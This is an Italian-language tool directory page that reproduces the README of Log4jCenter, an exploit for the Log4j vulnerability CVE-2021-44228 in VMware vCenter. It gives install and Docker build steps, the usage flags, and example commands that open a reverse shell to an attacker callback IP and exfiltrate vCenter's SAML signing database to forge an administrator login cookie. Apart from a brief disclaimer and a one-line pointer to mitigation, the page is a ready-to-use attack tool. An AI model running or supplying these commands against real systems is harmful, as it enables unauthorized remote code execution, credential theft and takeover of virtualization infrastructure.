Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Log4jCenter — Sfruttamento di CVE-2021-44228 in vCenter per esecuzione remota di codice e altro ancora. | Kitploit
Strumenti/GitHubGitHub/puzzlepeaches/log4jcenter
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebEsfiltrazione DatiPenetration TestingCommand and Control
GitHubpuzzlepeaches/log4jcenter

Log4jCenter

Sfruttamento di CVE-2021-44228 in vCenter per esecuzione remota di codice e altro ancora.

Vedi Repository
105194 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Log4jCenter

Sfruttamento di CVE-2021-44228 in vCenter per l'esecuzione remota di codice e altro. Il post del blog che descrive lo sfruttamento è collegato qui sotto:

  • Come sfruttare le vulnerabilità Log4j in VMWare vCenter

Perché?

Le proof of concept per questa vulnerabilità sono sparse e devono essere eseguite manualmente. Questo repository automatizza il processo di sfruttamento e mostra un ulteriore percorso di attacco possibile dopo lo sfruttamento.

Installazione

Questo repository può essere usato manualmente o con Docker.

Installazione manuale

Per scaricare ed eseguire manualmente l'exploit, segui i seguenti passaggi. Innanzitutto, assicurati che Java e Maven siano installati sul tuo host attaccante. Per farlo usando apt su sistemi operativi basati su Debian, esegui il seguente comando:

root@kitploit:~
apt update && apt install openjdk-11-jre maven

Clona il repository GitHub e installa tutti i requisiti Python:

root@kitploit:~
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jCenter \
    && cd Log4jCenter && pip3 install -r requirements.txt

Dalla radice del repository Log4jCenter, compila il progetto Rogue-Jndi usando il comando qui sotto:

root@kitploit:~
mvn package -f utils/rogue-jndi/

Installazione con Docker

Prima di tutto, assicurati che Docker sia installato sul tuo host attaccante. (Non ti guiderò attraverso questa procedura)

Successivamente, esegui il seguente comando per clonare il repository e creare l'immagine Docker che useremo.

root@kitploit:~
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jCenter \
    && cd Log4jCenter && docker build -t log4jcenter .

Per eseguire il container, esegui un comando simile al seguente con i tuoi flag da riga di comando aggiunti alla fine. Ad esempio, il comando qui sotto verrebbe usato per sfruttare vCenter e ottenere una reverse shell. Nota che il container non catturerà la reverse shell. Devi creare un listener ncat in una sessione di shell separata:

root@kitploit:~
docker run -it -v $(pwd)/loot:/Log4jCenter/loot -p 8090:8090 -p 1389:1389 log4jcenter \ 
    -t 10.100.100.1 -i 192.168.1.1 -p 4444 -r

Utilizzo

root@kitploit:~
usage: exploit.py [-h] -t IP -i CALLBACK [-p PORT] [-e] [-r]

optional arguments:
  -h, --help            show this help message and exit
  -t IP, --target IP    vCenter Host IP
  -i CALLBACK, --ip CALLBACK
                        Callback IP for payload delivery and reverse shell.
  -p PORT, --port PORT  Callback port for reverse shell.
  -e, --exfiltrate      Module to pull SAML DB
  -r, --revshell        Module to establish reverse shell

Esempi

Ottieni una reverse shell usando lo strumento installato sul tuo sistema locale:

root@kitploit:~
python3 exploit.py -t vcenter.acme.com -i 10.10.10.1 -p 4444 -r

Esfiltra i database di firma SAML dall'interno di un container Docker:

root@kitploit:~
docker run -it -v $(pwd)/loot:/Log4jCenter/loot -p 1389:1389 -p 8090:8090 log4jcenter \
    -t 10.100.100.1 -i 192.168.1.1 -e

Note

  • Per qualche motivo sconosciuto, il payload della reverse shell potrebbe non attivarsi dopo la prima esecuzione dello script. Potrebbe essere necessario eseguire l'exploit alcune volte per ottenere la callback. Esplorerò questo problema e includerò una correzione in una versione futura.
  • Nella directory utils è incluso il repository vcenter_saml_login. Puoi usarlo in combinazione con il flag -e per esfiltrare il database di firma SAML di vCenter e generare un cookie di login amministrativo per vSphere. Dovrai installare i requisiti separatamente.
  • Per i difensori, puoi mitigare questo problema usando una patch in arrivo o la soluzione alternativa descritta qui

Disclaimer

Questo strumento è progettato per l'uso durante test di penetrazione; l'utilizzo di questo strumento per attaccare bersagli senza previo consenso reciproco è illegale. È responsabilità dell'utente finale rispettare tutte le leggi locali, statali e federali applicabili. Gli sviluppatori non si assumono alcuna responsabilità e non sono responsabili di qualsiasi uso improprio di questo programma.

Scarica lo strumento